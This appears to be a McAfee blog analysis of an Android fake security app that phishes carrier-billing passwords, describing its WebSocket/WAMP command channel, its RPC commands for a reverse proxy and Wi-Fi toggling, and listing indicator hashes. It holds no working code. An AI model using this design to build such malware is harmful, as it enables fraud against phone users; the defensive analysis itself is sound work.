When a user installs and launches this malware, it asks for the Service password. Cleverly, the malware shows incorrect password messages to collect the more precise passwords. Of course, it does not matter whether the password is correct or not. It is a way of getting the Service password. The Service password is used for the payment service which provides easy online payments. The user can start this payment service by setting a Service password. The charge will be paid along with the mobile phone bill. 

Interface comparison.
Interface comparison.

How does this malware work?

There is a native library named ‘’ loaded during the app execution written in Golang. The library, when loaded, tries to connect to the C2 server using a Web Socket. Web Application Messaging Protocol (WAMP) is used to communicate and process Remote Procedure Calls (RPC). When the connection is made, the malware sends out network information along with the phone number. Then, it registers the client’s procedure commands described in the table below. The web socket connection is kept alive and takes the corresponding action when the command is received from the server like an Agent. And the socket is used to send the Service password out to the attacker when the user enters the Service password on the activity. 

RPC Function name  Description 
connect_to  Create reverse proxy and connect to remote server 
disconnect  Disconnect the reverse proxy 
get_status  Send the reverse proxy status 
get_info  Send line number, connection type, operator, and so on 
toggle_wifi  Set the Wi-Fi ON/OFF 
show_battery_opt  Show dialog to exclude battery optimization for background work 

Registered RPC functions description 

Initial Hello packet contains personal information
Initial Hello packet contains personal information
Sending out The Service password
Sending out The Service password

To make a fraudulent purchase by using leaked information, the attacker needs to use the user’s network. The RPC command ‘toggle_wifi’ can switch the connection state to Wi-Fi or cellular network, and ‘connect_to’ will provide a reverse proxy to the attacker. A reverse proxy can allow connecting the host behind a NAT (Network Address Translation) or a firewall. Via the proxy, the attacker can send purchase requests via the user’s network. 

Network and command flow diagram
Network and command flow diagram


It is an interesting point that the malware uses a reverse proxy to steal the user’s network and implement an Agent service with WAMP. McAfee Mobile Research Team will continue to find this kind of threat and protect our customers from mobile threats. It is recommended to be more careful when entering a password or confidential information into untrusted applications. 

IoCs (Indicators of Compromise) 


SHA256  Package Name  Distribution  
5d29dd12faaafd40300752c584ee3c072d6fc9a7a98a357a145701aaa85950dd  Google Play 
e133be729128ed6764471ee7d7c36f2ccb70edf789286cc3a834e689432fc9b0  Other 
e7948392903e4c8762771f12e2d6693bf3e2e091a0fc88e91b177a58614fef02  com.z.px.appx  Google Play 
3971309ce4a3cfb3cdbf8abde19d46586f6e4d5fc9f54c562428b0e0428325ad  Other 
2ec2fb9e20b99f60a30aaa630b393d8277949c34043ebe994dd0ffc7176904a4  com.jg.rc.papp  Google Drive 
af0d2e5e2994a3edd87f6d0b9b9a85fb1c41d33edfd552fcc64b43c713cdd956  Google Drive 


The post Fake Security App Found Abuses Japanese Payment System appeared first on McAfee Blog.